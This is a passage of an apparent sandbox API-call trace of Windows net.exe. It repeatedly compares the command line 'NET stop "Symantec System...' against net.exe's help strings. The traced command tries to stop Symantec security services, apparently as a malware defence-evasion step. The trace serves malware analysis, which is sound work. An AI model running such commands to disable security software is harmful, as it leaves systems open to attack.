lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x19 [0040.044] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x1b) returned 16 [0040.044] LocalFree (hMem=0x263f70) returned 0x0 [0040.044] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x1b [0040.044] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x1b) returned 13 [0040.044] LocalFree (hMem=0x263f70) returned 0x0 [0040.044] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="塠&⡋瓢\r㽰&\r") returned 0xbe [0040.044] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System", _String2="NET GROUP\r\n[groupname [/COM", _MaxCount=0x1b) returned 12 [0040.044] LocalFree (hMem=0x265860) returned 0x0 [0040.044] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r塠&\r") returned 0x33 [0040.044] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System", _String2="NET HELP\r\ncommand\r\n -or", _MaxCount=0x1b) returned 11 [0040.044] LocalFree (hMem=0x263f70) returned 0x0 [0040.044] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x19 [0040.044] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x1b) returned 11 [0040.044] LocalFree (hMem=0x263f70) returned 0x0 [0040.044] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="塠&⡋瓢\r㽰&\r") returned 0xc1 [0040.044] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System", _String2="NET LOCALGROUP\r\n[groupname ", _MaxCount=0x1b) returned 7 [0040.044] LocalFree (hMem=0x265860) returned 0x0 [0040.044] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r塠&\r") returned 0x16 [0040.044] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x1b) returned 3 [0040.045] LocalFree (hMem=0x263f70) returned 0x0 [0040.045] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x33 [0040.045] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System", _String2="NET SESSION\r\n[\\\\computernam", _MaxCount=0x1b) returned 15 [0040.045] LocalFree (hMem=0x263f70) returned 0x0 [0040.045] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="塠&⡋瓢\r㽰&\r") returned 0x234 [0040.045] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System", _String2="NET SHARE\r\nsharename\r\n ", _MaxCount=0x1b) returned 12 [0040.045] LocalFree (hMem=0x265860) returned 0x0 [0040.045] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r塠&\r") returned 0x13 [0040.045] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System", _String2="NET START BROWSER\r\n", _MaxCount=0x1b) returned 14 [0040.045] LocalFree (hMem=0x263f70) returned 0x0 [0040.045] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x14 [0040.045] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x1b) returned 14 [0040.045] LocalFree (hMem=0x263f70) returned 0x0 [0040.045] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x14 [0040.045] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System", _String2="NET START EVENTLOG\r\n", _MaxCount=0x1b) returned 14 [0040.045] LocalFree (hMem=0x263f70) returned 0x0 [0040.045] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x15 [0040.045] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System", _String2="NET START MESSENGER\r\n", _MaxCount=0x1b) returned 14 [0040.045] LocalFree (hMem=0x263f70) returned 0x0 [0040.045] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x15 [0040.045] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System", _String2="NET START NET LOGON\r\n", _MaxCount=0x1b) returned 14 [0040.045] LocalFree (hMem=0x263f70) returned 0x0 [0040.045] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x16 [0040.045] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x1b) returned 14 [0040.045] LocalFree (hMem=0x263f70) returned 0x0 [0040.045] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x11 [0040.045] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System", _String2="NET START RPCSS\r\n", _MaxCount=0x1b) returned 14 [0040.045] LocalFree (hMem=0x263f70) returned 0x0 [0040.045] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x14 [0040.045] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System", _String2="NET START SCHEDULE\r\n", _MaxCount=0x1b) returned 14 [0040.045] LocalFree (hMem=0x263f70) returned 0x0 [0040.045] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x12 [0040.045] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System", _String2="NET START SERVER\r\n", _MaxCount=0x1b) returned 14 [0040.045] LocalFree (hMem=0x263f70) returned 0x0 [0040.045] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0xf [0040.045] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System", _String2="NET START UPS\r\n", _MaxCount=0x1b) returned 14 [0040.046] LocalFree (hMem=0x263f70) returned 0x0 [0040.046] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x17 [0040.046] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System", _String2="NET START WORKSTATION\r\n", _MaxCount=0x1b) returned 14 [0040.046] LocalFree (hMem=0x263f70) returned 0x0 [0040.046] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x18 [0040.046] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x1b) returned 14 [0040.046] LocalFree (hMem=0x263f70) returned 0x0 [0040.046] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x2a [0040.046] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System", _String2="NET STATISTICS\r\n[WORKSTATIO", _MaxCount=0x1b) returned 14 [0040.046] LocalFree (hMem=0x263f70) returned 0x0 [0040.046] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x15 [0040.046] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x1b) returned 19 [0040.046] LocalFree (hMem=0x263f70) returned 0x0 [0040.046] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="塠&⡋瓢\r㽰&\r") returned 0x58 [0040.046] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System", _String2="NET TIME\r\n\r\n[\\\\computername", _MaxCount=0x1b) returned -1 [0040.046] LocalFree (hMem=0x265860) returned 0x0 [0040.046] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="塠&⡋瓢\r塠&\r") returned 0x184 [0040.046] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System", _String2="NET USE\r\n[devicename | *] [", _MaxCount=0x1b) returned -2 [0040.046] LocalFree (hMem=0x265860) returned 0x0 [0040.046] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="塠&⡋瓢\r塠&\r") returned 0xc7 [0040.046] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System", _String2="NET USER\r\n[username [passwo", _MaxCount=0x1b) returned -2 [0040.046] LocalFree (hMem=0x265860) returned 0x0 [0040.046] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="塠&⡋瓢\r塠&\r") returned 0x47 [0040.046] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System", _String2="NET VIEW\r\n[\\\\computername [", _MaxCount=0x1b) returned -3 [0040.046] LocalFree (hMem=0x265860) returned 0x0 [0040.046] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="塠&⡋瓢\r塠&\r") returned 0xc2 [0040.046] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System", _String2="NET\r\n [ ACCOUNTS | COMPU", _MaxCount=0x1b) returned 19 [0040.046] LocalFree (hMem=0x265860) returned 0x0 [0040.046] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="塠&⡋瓢\r塠&\r") returned 0x319 [0040.046] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System", _String2="SERVICES\r\nNET START can be ", _MaxCount=0x1b) returned -5 [0040.046] LocalFree (hMem=0x265860) returned 0x0 [0040.046] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="塠&⡋瓢\r塠&\r") returned 0x483 [0040.046] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System", _String2="SYNTAX\r\nThe following conve", _MaxCount=0x1b) returned -5 [0040.046] LocalFree (hMem=0x265860) returned 0x0 [0040.046] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="塠&⡋瓢\r塠&\r") returned 0xa86 [0040.046] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System", _String2="NAMES\r\nThe following types ", _MaxCount=0x1b) returned 4 [0040.047] LocalFree (hMem=0x265860) returned 0x0 [0040.047] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="塠&⡋瓢\r塠&\r") returned 0x54 [0040.047] _wcsnicmp (_String1="NET stop ΓÇ£Symantec System", _String2="\r\nFor more information on t", _MaxCount=0x1b) returned 97 [0040.047] LocalFree (hMem=0x265860) returned 0x0 [0040.047] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="塠&⡋瓢\r塠&\r") returned 0xad [0040.047] _wcsnicmp (_String1="NET stop ΓÇ£Symantec", _String2="NET ACCOUNTS\r\n[/FORC", _MaxCount=0x14) returned 18 [0040.047] LocalFree (hMem=0x265860) returned 0x0 [0040.047] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r塠&\r") returned 0x2e [0040.047] _wcsnicmp (_String1="NET stop ΓÇ£Symantec", _String2="NET COMPUTER\r\n\\\\comp", _MaxCount=0x14) returned 16 [0040.047] LocalFree (hMem=0x263f70) returned 0x0 [0040.047] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="塠&⡋瓢\r㽰&\r") returned 0x7d [0040.047] _wcsnicmp (_String1="NET stop ΓÇ£Symantec", _String2="NET CONFIG SERVER\r\n[", _MaxCount=0x14) returned 16 [0040.047] LocalFree (hMem=0x265860) returned 0x0 [0040.047] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r塠&\r") returned 0x26 [0040.047] _wcsnicmp (_String1="NET stop ΓÇ£Symantec", _String2="NET CONFIG\r\n[SERVER ", _MaxCount=0x14) returned 16 [0040.047] LocalFree (hMem=0x263f70) returned 0x0 [0040.047] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x19 [0040.047] _wcsnicmp (_String1="NET stop ΓÇ£Symantec", _String2="NET CONTINUE\r\nservic", _MaxCount=0x14) returned 16 [0040.047] LocalFree (hMem=0x263f70) returned 0x0 [0040.047] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x1b [0040.047] _wcsnicmp (_String1="NET stop ΓÇ£Symantec", _String2="NET FILE\r\n[id [/CLOS", _MaxCount=0x14) returned 13 [0040.047] LocalFree (hMem=0x263f70) returned 0x0 [0040.047] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="塠&⡋瓢\r㽰&\r") returned 0xbe [0040.047] _wcsnicmp (_String1="NET stop ΓÇ£Symantec", _String2="NET GROUP\r\n[groupnam", _MaxCount=0x14) returned 12 [0040.047] LocalFree (hMem=0x265860) returned 0x0 [0040.047] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r塠&\r") returned 0x33 [0040.047] _wcsnicmp (_String1="NET stop ΓÇ£Symantec", _String2="NET HELP\r\ncommand\r\n ", _MaxCount=0x14) returned 11 [0040.047] LocalFree (hMem=0x263f70) returned 0x0 [0040.047] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x19 [0040.047] _wcsnicmp (_String1="NET stop ΓÇ£Symantec", _String2="NET HELPMSG\r\nmessage", _MaxCount=0x14) returned 11 [0040.047] LocalFree (hMem=0x263f70) returned 0x0 [0040.047] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="塠&⡋瓢\r㽰&\r") returned 0xc1 [0040.047] _wcsnicmp (_String1="NET stop ΓÇ£Symantec", _String2="NET LOCALGROUP\r\n[gro", _MaxCount=0x14) returned 7 [0040.048] LocalFree (hMem=0x265860) returned 0x0 [0040.048] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r塠&\r") returned 0x16 [0040.048] _wcsnicmp (_String1="NET stop ΓÇ£Symantec", _String2="NET PAUSE\r\nservice\r\n", _MaxCount=0x14) returned 3 [0040.048] LocalFree (hMem=0x263f70) returned 0x0 [0040.048] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x33 [0040.048] _wcsnicmp (_String1="NET stop ΓÇ£Symantec", _String2="NET SESSION\r\n[\\\\comp", _MaxCount=0x14) returned 15 [0040.048] LocalFree (hMem=0x263f70) returned 0x0 [0040.048] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="塠&⡋瓢\r㽰&\r") returned 0x234 [0040.048] _wcsnicmp (_String1="NET stop ΓÇ£Symantec", _String2="NET SHARE\r\nsharename", _MaxCount=0x14) returned 12 [0040.048] LocalFree (hMem=0x265860) returned 0x0 [0040.048] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r塠&\r") returned 0x13 [0040.048] _wcsnicmp (_String1="NET stop ΓÇ£Symantec", _String2="NET START BROWSER\r\n", _MaxCount=0x14) returned 14 [0040.048] LocalFree (hMem=0x263f70) returned 0x0 [0040.048] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x14 [0040.048] _wcsnicmp (_String1="NET stop ΓÇ£Symantec", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x14) returned 14 [0040.048] LocalFree (hMem=0x263f70) returned 0x0 [0040.048] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x14 [0040.048] _wcsnicmp (_String1="NET stop ΓÇ£Symantec", _String2="NET START EVENTLOG\r\n", _MaxCount=0x14) returned 14 [0040.048] LocalFree (hMem=0x263f70) returned 0x0 [0040.048] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x15 [0040.048] _wcsnicmp (_String1="NET stop ΓÇ£Symantec", _String2="NET START MESSENGER\r", _MaxCount=0x14) returned 14 [0040.048] LocalFree (hMem=0x263f70) returned 0x0 [0040.048] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x15 [0040.048] _wcsnicmp (_String1="NET stop ΓÇ£Symantec", _String2="NET START NET LOGON\r", _MaxCount=0x14) returned 14 [0040.048] LocalFree (hMem=0x263f70) returned 0x0 [0040.048] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x16 [0040.049] _wcsnicmp (_String1="NET stop ΓÇ£Symantec", _String2="NET START RPCLOCATOR", _MaxCount=0x14) returned 14 [0040.049] LocalFree (hMem=0x263f70) returned 0x0 [0040.049] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x11 [0040.049] _wcsnicmp (_String1="NET stop ΓÇ£Symantec", _String2="NET START RPCSS\r\n", _MaxCount=0x14) returned 14 [0040.049] LocalFree (hMem=0x263f70) returned 0x0 [0040.049] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x14 [0040.049] _wcsnicmp (_String1="NET stop ΓÇ£Symantec", _String2="NET START SCHEDULE\r\n", _MaxCount=0x14) returned 14 [0040.049] LocalFree (hMem=0x263f70) returned 0x0 [0040.049] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x12 [0040.049] _wcsnicmp (_String1="NET stop ΓÇ£Symantec", _String2="NET START SERVER\r\n", _MaxCount=0x14) returned 14 [0040.049] LocalFree (hMem=0x263f70) returned 0x0 [0040.049] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0xf [0040.049] _wcsnicmp (_String1="NET stop ΓÇ£Symantec", _String2="NET START UPS\r\n", _MaxCount=0x14) returned 14 [0040.049] LocalFree (hMem=0x263f70) returned 0x0 [0040.049] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x17 [0040.049] _wcsnicmp (_String1="NET stop ΓÇ£Symantec", _String2="NET START WORKSTATIO", _MaxCount=0x14) returned 14 [0040.049] LocalFree (hMem=0x263f70) returned 0x0 [0040.049] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x18 [0040.049] _wcsnicmp (_String1="NET stop ΓÇ£Symantec", _String2="NET START\r\n[service]", _MaxCount=0x14) returned 14 [0040.049] LocalFree (hMem=0x263f70) returned 0x0 [0040.049] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x2a [0040.049] _wcsnicmp (_String1="NET stop ΓÇ£Symantec", _String2="NET STATISTICS\r\n[WOR", _MaxCount=0x14) returned 14 [0040.049] LocalFree (hMem=0x263f70) returned 0x0 [0040.049] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="㽰&⡋瓢\r㽰&\r") returned 0x15 [0040.049] _wcsnicmp (_String1="NET stop ΓÇ£Symantec", _String2="NET STOP\r\nservice\r\n\r", _MaxCount=0x14) returned 19 [0040.049] LocalFree (hMem=0x263f70) returned 0x0 [0040.049] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="顠&⡋瓢\r㽰&\r") returned 0x58 [0040.049] _wcsnicmp (_String1="NET stop ΓÇ£Symantec", _String2="NET TIME\r\n\r\n[\\\\compu", _MaxCount=0x14) returned -1 [0040.049] LocalFree (hMem=0x269860) returned 0x0 [0040.049] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="顠&⡋瓢\r顠&\r") returned 0x184 [0040.049] _wcsnicmp (_String1="NET stop ΓÇ£Symantec", _String2="NET USE\r\n[devicename", _MaxCount=0x14) returned -2 [0040.049] LocalFree (hMem=0x269860) returned 0x0 [0040.049] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="顠&⡋瓢\r顠&\r") returned 0xc7 [0040.049] _wcsnicmp (_String1="NET stop ΓÇ£Symantec", _String2="NET USER\r\n[username ", _MaxCount=0x14) returned -2 [0040.050] LocalFree (hMem=0x269860) returned 0x0 [0040.050] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="顠&⡋瓢\r顠&\r") returned 0x47 [0040.050] _wcsnicmp (_String1="NET stop ΓÇ£Symantec", _String2="NET VIEW\r\n[\\\\compute", _MaxCount=0x14) returned -3 [0040.050] LocalFree (hMem=0x269860) returned 0x0 [0040.050] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74710000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0xdf6dc, nSize=0x0, Arguments=0xdf6d8 | out: lpBuffer="顠&⡋瓢\r顠&\r") returned 0xc2 [0040.050] _wcsnicmp (_String1="NET stop ΓÇ£Symantec", _String2="NET\r\n [ ACCOUNTS ", _MaxCount=0x14) returned 19 [0040.050] LocalFree (hMem=0x269860) returned 0x0 [0040.050] FormatMessageW (in: 